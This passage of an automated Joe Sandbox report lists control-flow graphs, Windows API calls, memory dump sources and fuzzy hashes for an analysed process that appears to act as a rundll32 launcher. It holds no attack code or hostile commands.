                                                                                          control_flow_graph 239 dd40b1-dd40da NtQuerySystemInformation 240 dd40dc-dd40e0 239->240 241 dd40e4-dd40f2 call dd61b0 239->241 240->241 242 dd40e2 240->242 242->241
                                                                                          APIs
                                                                                          • NtQuerySystemInformation.NTDLL ref: 00DD40D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQuerySystem
                                                                                          • String ID:
                                                                                          • API String ID: 3562636166-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 245 dd5e4f-dd5e78 LdrResolveDelayLoadedAPI
                                                                                          APIs
                                                                                          • LdrResolveDelayLoadedAPI.NTDLL(00DD0000,?,?), ref: 00DD5E71
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: DelayLoadedResolve
                                                                                          • String ID:
                                                                                          • API String ID: 841769287-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 246 dd6510-dd651d SetUnhandledExceptionFilter
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000064C0), ref: 00DD6515
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 120 dd5f25-dd5f4c call dd67e8 GetStartupInfoW 123 dd5f4e-dd5f5d 120->123 124 dd5f5f-dd5f61 123->124 125 dd5f77-dd5f79 123->125 127 dd5f6a-dd5f75 Sleep 124->127 128 dd5f63-dd5f68 124->128 126 dd5f7a-dd5f80 125->126 129 dd5f8c-dd5f92 126->129 130 dd5f82-dd5f8a _amsg_exit 126->130 127->123 128->126 132 dd5f94-dd5fa4 call dd6100 129->132 133 dd5fc0 129->133 131 dd5fc6-dd5fcc 130->131 135 dd5fce-dd5fdf _initterm 131->135 136 dd5fe9-dd5feb 131->136 137 dd5fa9-dd5fad 132->137 133->131 135->136 138 dd5fed-dd5ff4 136->138 139 dd5ff6-dd5ffd 136->139 137->131 140 dd5faf-dd5fbb 137->140 138->139 141 dd5fff-dd600c call dd6640 139->141 142 dd6022-dd602b 139->142 145 dd60f0-dd60ff 140->145 141->142 148 dd600e-dd6020 141->148 142->140 144 dd602d-dd6033 142->144 147 dd6036-dd603c 144->147 149 dd608d-dd6090 147->149 150 dd603e-dd6041 147->150 148->142 151 dd609e-dd60a4 149->151 152 dd6092-dd609b 149->152 153 dd605c-dd6060 150->153 154 dd6043-dd6045 150->154 151->147 156 dd60d5-dd60dc 151->156 152->151 158 dd6068-dd606a 153->158 159 dd6062-dd6066 153->159 154->149 157 dd6047-dd604a 154->157 162 dd60de-dd60e4 _cexit 156->162 163 dd60e9 156->163 157->153 161 dd604c-dd604f 157->161 160 dd606b-dd6073 call dd4136 158->160 159->160 166 dd6078-dd6084 160->166 161->153 165 dd6051-dd605a 161->165 162->163 163->145 165->157 166->156 167 dd6086-dd6087 exit 166->167 167->149
                                                                                          APIs
                                                                                          • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00DD6C20,00000058), ref: 00DD5F3A
                                                                                          • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8), ref: 00DD5F6F
                                                                                          • _amsg_exit.MSVCRT ref: 00DD5F84
                                                                                          • _initterm.MSVCRT ref: 00DD5FD8
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00DD6004
                                                                                          • exit.MSVCRT ref: 00DD6087
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
                                                                                          • String ID:
                                                                                          • API String ID: 2849151604-0

                                                                                          APIs
                                                                                          • LoadIconW.USER32(?,00000064), ref: 00DD5C95
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00DD5CA4
                                                                                          • RegisterClassW.USER32(?), ref: 00DD5CC7
                                                                                          • CreateWindowExW.USER32(00000080,RunDLL,00DD19A0,00000000,80000000,80000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00DD5CE6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$ClassCreateCursorIconRegisterWindow
                                                                                          • String ID: RunDLL
                                                                                          • API String ID: 1446224504-1316671358

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 208 dd3e5b-dd3e9c call dd3c66 211 dd3f62-dd3f68 208->211 212 dd3ea2-dd3eb7 call dd3d62 208->212 215 dd3ebd-dd3ec2 212->215 216 dd3f46-dd3f49 212->216 218 dd3f29-dd3f39 215->218 219 dd3ec4-dd3ec6 215->219 217 dd3f4e-dd3f5c call dd38f0 FreeLibrary 216->217 217->211 218->211 219->218 221 dd3ec8-dd3ecd 219->221 221->218 223 dd3ecf-dd3ed1 221->223 224 dd3ed4-dd3edd 223->224 224->224 225 dd3edf-dd3f0a WideCharToMultiByte LocalAlloc 224->225 226 dd3f0c-dd3f27 WideCharToMultiByte 225->226 227 dd3f3b-dd3f44 225->227 226->218 227->217
                                                                                          APIs
                                                                                            • Part of subcall function 00DD3C66: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00DD3C87
                                                                                            • Part of subcall function 00DD3C66: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00DD3C93
                                                                                            • Part of subcall function 00DD3D62: _wtoi.MSVCRT(?), ref: 00DD3D94
                                                                                            • Part of subcall function 00DD3D62: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00DD3DA0
                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00DD3EF5
                                                                                          • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000), ref: 00DD3F00
                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00DD3F1E
                                                                                          • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?), ref: 00DD3F5C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharLibraryMultiWide$AddressAllocErrorFreeLastLoadLocalProc_wtoi
                                                                                          • String ID:
                                                                                          • API String ID: 1343397253-0
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00DD62F6,00DD1000), ref: 00DD61C7
                                                                                          • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00DD62F6,?,00DD62F6,00DD1000), ref: 00DD61D0
                                                                                          • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00DD62F6,00DD1000), ref: 00DD61DB
                                                                                          • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00DD62F6,00DD1000), ref: 00DD61E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 3231755760-0
                                                                                          APIs
                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00000000), ref: 00DD265E
                                                                                          • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00DD2737
                                                                                          • OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0(?), ref: 00DD27A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                          • String ID:
                                                                                          • API String ID: 4268342597-0
                                                                                          APIs
                                                                                          • RtlImageNtHeader.NTDLL ref: 00DD3F7A
                                                                                          • ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,?), ref: 00DD3FCA
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Image$DataDirectoryEntryHeader
                                                                                          • String ID:
                                                                                          • API String ID: 3478907836-0
                                                                                          APIs
                                                                                          • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00DD161C,00000000,00000001,00DD1940,?), ref: 00DD2072
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInstance
                                                                                          • String ID:
                                                                                          • API String ID: 542301482-0
                                                                                          • Opcode ID: 11cbcbb2841ca269b91798cb09c23c925a858dcf5498b03af3b3791496f92bbb
                                                                                          • Instruction ID: 8544b4a91140c8af405788a512a3d747f1ab44ef73611e025a906f49034ac492
                                                                                          • Opcode Fuzzy Hash: 11cbcbb2841ca269b91798cb09c23c925a858dcf5498b03af3b3791496f92bbb
                                                                                          • Instruction Fuzzy Hash: B0F08239740218BFCB10DB94DC55F9DBB6DEB88710F140056FA06E7390CAB2AE01CBA4
                                                                                          APIs
                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000), ref: 00DD21D8
                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00DD223F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFormatMessageThread
                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                          • API String ID: 2411632146-3173542853
                                                                                          • Opcode ID: b62979bb58d2dd27b5646e718c63128af9e7c228aaf94ded73017443570bc99d
                                                                                          • Instruction ID: e8dcff6b794e3250c0be9c541de9cd0cf9d9fa6468f0be02b90171e448c5f5bc
                                                                                          • Opcode Fuzzy Hash: b62979bb58d2dd27b5646e718c63128af9e7c228aaf94ded73017443570bc99d
                                                                                          • Instruction Fuzzy Hash: 4D510F71900300BADB305FA58C49F77BBB9EB65700F088A9FF14692362DA71E948CB75
                                                                                          APIs
                                                                                            • Part of subcall function 00DD3A51: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00DD3A7B
                                                                                            • Part of subcall function 00DD3A51: memset.MSVCRT ref: 00DD3A8F
                                                                                            • Part of subcall function 00DD3A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00DD3AA6
                                                                                            • Part of subcall function 00DD3A51: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00DD3AC1
                                                                                            • Part of subcall function 00DD3A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00DD3AE1
                                                                                            • Part of subcall function 00DD3A51: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00DD3AF3
                                                                                          • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00DD3B39
                                                                                          • IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00DD3B40
                                                                                          • GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00DD3B6C
                                                                                          • PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00DD3B87
                                                                                          • RtlWow64IsWowGuestMachineSupported.NTDLL ref: 00DD3BA9
                                                                                          • GetSystemWow64Directory2W.API-MS-WIN-CORE-WOW64-L1-1-1(?,000000F6,?), ref: 00DD3BC9
                                                                                          • Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000000), ref: 00DD3BD4
                                                                                          • memset.MSVCRT ref: 00DD3BE6
                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00DD3C08
                                                                                          • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000), ref: 00DD3C16
                                                                                          • Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000001), ref: 00DD3C20
                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF), ref: 00DD3C36
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00DD3C44
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00DD3C50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Wow64$File$CloseHandle$CreateEnableProcessReadRedirectionSystemmemset$AppendCommandCurrentDirectoryDirectory2GuestLineMachineObjectPathPointerProcess2SingleSupportedWait
                                                                                          • String ID: rundll32.exe
                                                                                          • API String ID: 1294557600-3034741169
                                                                                          • Opcode ID: 65aec23028c75846522d8d52bf25dc6f96d76689843b72234012a688c090ad81
                                                                                          • Instruction ID: 50e1569da5ca61cd95bf588d889f874c6b1e65866ff37ffc96f05fa3d370f52f
                                                                                          • Opcode Fuzzy Hash: 65aec23028c75846522d8d52bf25dc6f96d76689843b72234012a688c090ad81
                                                                                          • Instruction Fuzzy Hash: 11315372901329ABDF21AB60DC8DFEAB77CAB08700F050197E509D2250DB359B85DBB1
                                                                                          APIs
                                                                                          • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00DD37D4
                                                                                          • CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00DD19CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00DD37F0
                                                                                          • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00DD38E7
                                                                                            • Part of subcall function 00DD205A: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00DD161C,00000000,00000001,00DD1940,?), ref: 00DD2072
                                                                                          • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00DD3808
                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00DD381D
                                                                                            • Part of subcall function 00DD53AD: InitOnceExecuteOnce.API-MS-WIN-CORE-SYNCH-L1-2-0(00DD84A4,00DD53D0,00000000,00000000,00DD382A), ref: 00DD53BB
                                                                                          • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00DD3866
                                                                                          • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD3873
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00DD387A
                                                                                          • CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00DD8420,?), ref: 00DD3897
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00DD38D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateEvent$CloseHandleInitializeOnce$CurrentExecuteHandlesInitInstanceMultipleSecurityThreadUninitializeWait
                                                                                          • String ID:
                                                                                          • API String ID: 2536006573-0
                                                                                          • Opcode ID: ea576fd22e638105744acb36e0a5d55a1f91304752d3b7956cbf6e647319cfe6
                                                                                          • Instruction ID: a1f755337466dc251aca3730a4093920728c046b0eac5df061652268f5ff96ee
                                                                                          • Opcode Fuzzy Hash: ea576fd22e638105744acb36e0a5d55a1f91304752d3b7956cbf6e647319cfe6
                                                                                          • Instruction Fuzzy Hash: B3315071601305AFE7116FB0AC9CFBABBADEB44749B04402BF506E2351DB76D904AB31
                                                                                          APIs
                                                                                          • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,000000C8), ref: 00DD391E
                                                                                          • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000402,?,000000C8,?,000000C8), ref: 00DD3963
                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(CONOUT$,C0000000,00000003,00000000,00000003,00000000,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00DD3992
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00DD39D0
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,00DD1844,00000002,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00DD39E6
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00DD3A15
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000001,?,00000402,?,000000C8,?,000000C8), ref: 00DD3A1C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$LoadString$CloseCreateFileHandle
                                                                                          • String ID: CONOUT$
                                                                                          • API String ID: 258192622-3130406586
                                                                                          • Opcode ID: 51ad7b869b0aa3bbc258c09cc28cb3e2e2d0f1c418b5727f501c515e6770a006
                                                                                          • Instruction ID: 7f9678237b08fe1b9b8ad4a8ff69c65f90ef7c2b6d776495105180a7c90c90f2
                                                                                          • Opcode Fuzzy Hash: 51ad7b869b0aa3bbc258c09cc28cb3e2e2d0f1c418b5727f501c515e6770a006
                                                                                          • Instruction Fuzzy Hash: BC318271600229ABEB20DB64DC55FEBB77CEB45B05F044096FA0AD6280E670EB49CE71
                                                                                          APIs
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD3431
                                                                                          • DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00DD3443
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD346A
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD347C
                                                                                          • AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD34CF
                                                                                          • EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00DD34E1
                                                                                          • DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(00000000), ref: 00DD34EF
                                                                                          • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00DD350F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lock$PointerReleaseShared$AcquireDecodeExclusive$Encode
                                                                                          • String ID:
                                                                                          • API String ID: 3770696666-0
                                                                                          • Opcode ID: c6080ee552c9cf45b5077d5d57bb1153e8b6ba827da848bdeb5c5d82dad3e09b
                                                                                          • Instruction ID: 54510751c70210473b552621706d565c0d7c7e3e24ad53a0f8201c8ac912023d
                                                                                          • Opcode Fuzzy Hash: c6080ee552c9cf45b5077d5d57bb1153e8b6ba827da848bdeb5c5d82dad3e09b
                                                                                          • Instruction Fuzzy Hash: A3412B79A01318EFCB05DF64D89896DBBB9FF49710718409AE906E7320CB31AE01CFA1
                                                                                          APIs
                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?), ref: 00DD2B6D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 24740636-0
                                                                                          • Opcode ID: 87e198af46a1f898b718ca6cdd15e64ded9ccc2834af0b0347d7598632395ccb
                                                                                          • Instruction ID: bc79b0edd7952bb0aaa5cbe51b96ee79911cac428fb988f3e85558e9182c5f9a
                                                                                          • Opcode Fuzzy Hash: 87e198af46a1f898b718ca6cdd15e64ded9ccc2834af0b0347d7598632395ccb
                                                                                          • Instruction Fuzzy Hash: E231CA3061030AABEB205E69DC88BBF7769EF61360F244073F596D6394D3B5CD0296B2
                                                                                          APIs
                                                                                          • _wtoi.MSVCRT(?), ref: 00DD3D94
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00DD3DA0
                                                                                          • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00DD3DD3
                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,?,00000000,00000000), ref: 00DD3DF1
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00DD3E13
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00DD3E30
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00DD3E43
                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,00000000,?,00000000,00000000), ref: 00DD3E4C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
